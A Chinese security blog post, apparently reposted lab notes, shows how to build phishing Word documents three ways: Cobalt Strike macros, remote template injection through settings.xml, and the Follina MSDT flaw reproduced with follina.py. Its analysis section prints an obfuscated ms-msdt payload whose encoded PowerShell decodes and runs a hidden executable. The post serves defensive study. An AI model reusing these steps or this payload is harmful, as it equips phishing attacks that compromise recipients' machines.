钓鱼邮件那些事之word文档的密秘

点击上方蓝字

关注格物安全

 你好哇！今天早上，作为早八人的我刚刚起床洗漱完毕后，照旧打开了群聊，看看最新的漏洞消息，就看见了玉玉师傅发表了新的免杀视频教程，我迫不急待的打开了视频进行学习；看完视频后发现这不就是昨天睡觉前的Microsoft Office代码执行漏洞嘛！于是就有了今天这篇文章，这里再次感谢玉玉师傅和南城师傅对这篇文章的帮助！

宏病毒是什么？

答：宏病毒是一种存储在文档与模板的宏中的计算机病毒。如果我们下意识的点击带有宏病毒的文档，那么寄存在恶意文档里面的宏病毒就会被程序所执行，导致宏病毒被彻底的激活，并传染到我们的电脑中，并停留在Normal模板上。从此以后，所有自动保存的文档都会“感染”上这种宏病毒，而且如果其他用户打开了感染病毒的文档，宏病毒又会转移到他的计算机上。并且宏病毒感染电脑后会与Cobalt Strike中的监听模块相结合使得被感染的电脑被控制，进而达到被人利用Cobalt Strike偷窥感染电脑的个人隐私的目的。

Microsoft Office的远程模板是什么？

答：远程宏模板技术就是通过利用宏模板创建的文档在启动时会加载模板的原理，转而将其加载的正常模板替换为带有宏病毒的恶意模板；这里主要包括了两个文档的交换，这个技术在下文中就有明确的解释。

QVD-2022-7976的原理及危害？

攻击者可通过制作恶意的Office文件；利用文件中远程模板功能从服务器获取恶意HTML文件，通过ms-msdtURI来执行恶意的PowerShell代码，对目标主机进行连接；该漏洞可以在宏命令被禁用的情况下，仍能通过MSDT (Microsoft Support Diagnostics Tool)功能执行恶意代码，当且仅当恶意文件保存为RTF格式时，甚至只需要点击文件，通过资源管理器中的预览选项卡就可在目标机器上执行任意代码，对目标主机造成危害。

靶场环境：内网域环境 靶场资源：假设已经接入目标内网 靶场系统：Win7 x64旗舰版（虚拟机）；kali攻击机（虚拟机）；win11攻击机（虚拟机）

靶场目标：

• 宏病毒与CS联动进行钓鱼
• 简单修改远程代码执行钓鱼
• 利用QVD-2022-7976进行钓鱼

宏病毒与CS联动进行钓鱼

提示：这个片段是参考了笔者大一发表在自己博客上的文章与图片，仅仅做了一些修改（关于使用Cobalt Strike制作宏病毒：地址）

首先我们使用Cobalt Strike的监听工具创建一个监听端口

然后，后面会出现两次弹框，直接点击确定就好；我们使用Cobalt Strike的攻击模块进行我们宏病毒的制作就可以了。

这时会出现上面的弹框，我们点击Generate后会再次弹框

点击Copy Macro复制即可；这时打开你电脑自带的office套件创建一个模板

打开创建后会出现下图所示：（记得把原来的东西清空，在粘连哟！）然后Ctrl+s保存即可

补充：但是需要目标自己启用宏才可以达到远控的目的，所以在这种方法成功率不高！

简单修改远程代码执行钓鱼

首先建立一个启用宏的模板文件夹，然后保存到桌面上备用即可

然后我们通过Bandizip这款压缩包软件解压后得到下图文件，再找到word文件夹（这个环节有点像我们在CTF中遇见的做word杂项的步骤）；接下来就简单了

这个时候我们找到settings.xml文件，使用记事本打开后找到，file协议即可

因为我们要构造宏免杀，所以我们可以对file协议下手，我们发现http协议也可以被执行；所以可以用http协议去替换掉file协议；替换结果与原版比较如下图所示：

与此同时我们提前搭建好攻击方的监听系统，开启监听模式

这个时候我们把解压的压缩包复原成为word文档的样子；即保存成为期末考试.docx的样子并点击打开它

这个时候，我们就可以在攻击主机上收到消息了！！

这个方法非常的好用，又因为它足够简单，且没有CS的流量特征，并且它的免杀能力如下所示，也是非常强大的，因此获得了大部分红队成员的偏爱！

利用QVD-2022-7976漏洞进行钓鱼

首先我们需要去GitHub上；下载一个开源的工具，来进行钓鱼邮件的构；首先去下载follina.py（follina脚本：项目地址）

接下来，我们更据GitHub里的脚本使用办法进行构造钓鱼文件

python .follina.py -h
usage: follina.py [-h] -m {command,binary} [-b BINARY] [-c COMMAND] [-u URL] [-H HOST] [-p PORT]

options:
-h, --help            
#显示此帮助信息并退出

Required Arguments:
-m {command,binary}, --mode {command,binary}
#执行模式，可以是“二进制”以加载（远程）二进制文件，或“命令”以运行编码的 PS 命令

Binary Execution Arguments:
-b BINARY, --binary BINARY

Command Execution Arguments:
-c COMMAND, --command COMMAND
#在“命令”模式下执行的编码命令

Optional Arguments:
-u URL, --url URL     
#生成的文档应在其中检索您的有效负载的主机名或 IP 地址，默认为“localhost”
-H HOST, --host HOST
#Web服务器监听的接口，默认为所有接口（0.0.0.0）
-p PORT, --port PORT  
#运行 HTTP 服务器的端口，默认为 80

这里我们是复现的本地localhost的例子，所以使用的命令应该是：

python .follina.py -m binary -b windowssystem32calc.exe

会生成www文件夹与.docx文件，点击文件即可看报错弹窗与计算器弹窗！

结果如下图所示：

漏洞案例分析：

我们可以观察到如下HTML文件的代码，明显的通过了Base64加密（前面的字节填充原因是：HTML处理函数有一个硬编码的缓冲区大小，并且我们能够确认任何小于4096字节的文件都不会调用有效负载）

window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JGNtZCA9ICJjOlx3aW5kb3dzXHN5c3RlbTMyXGNtZC5leGUiO1N0YXJ0LVByb2Nlc3MgJGNtZCAtd2luZG93c3R5bGUgaGlkZGVuIC1Bcmd1bWVudExpc3QgIi9jIHRhc2traWxsIC9mIC9pbSBtc2R0LmV4ZSI7U3RhcnQtUHJvY2VzcyAkY21kIC13aW5kb3dzdHlsZSBoaWRkZW4gLUFyZ3VtZW50TGlzdCAiL2MgY2QgQzpcdXNlcnNccHVibGljXCYmZm yIC9yICV0ZW1wJSAlaSBpbiAoMDUtMjAyMi0wNDM4LnJhcikgZG8gY29weSAlaSAxLnJhciAveSYmZmluZHN0ciBUVk5EUmdBQUFBIDEucmFyPjEudCYmY2VydHV0aWwgLWRlY29kZSAxLnQgMS5jICYmZXhwYW5kIDEuYyAtRjoqIC4mJnJnYi5leGUiOw=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO"";

这是这个EXP的利用核心要素；即通过将模式用于ms-msdt，使用参数IT_BrowseForFile调用本地包PCWDiagnostic，最后将该参数包含嵌入其中的PowerShell语法$()中，使得命令被执行！

这里的msdt（自Windows Vista开始，Microsoft支持诊断工具被加入到Windows当中）出现问题，是因为自带的参数中的PCWDiagnostic这个参数可以帮助用户配置较旧的程序所导致的！

众所周知，马上hvv要开打了，红队的师傅们也开始准备各种钓鱼文件了；由于作者水平不高，只能浅谈一些简单的钓鱼文件制作过程，起到抛砖引玉的作用，来提高大家的警觉性，通过这次的剖析，达到防御的目的！这次写作过程时间仓促，难免有所遗漏和不足，欢迎大家批评指正！

作者：面包and牛奶本篇文章转载自Freebuf原文地址：https://www.freebuf.com/articles/system/334909.html

(

END

)

「由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人承担，EXP 与 POC 仅供对已授权的目标使用测试。本文中的漏洞均为公开的漏洞收集，若文章中的敏感内容产生了部分影响，请及时联系作者删除，望师傅们谅解」

原文始发于微信公众号（格物安全）：钓鱼邮件那些事之word文档的密秘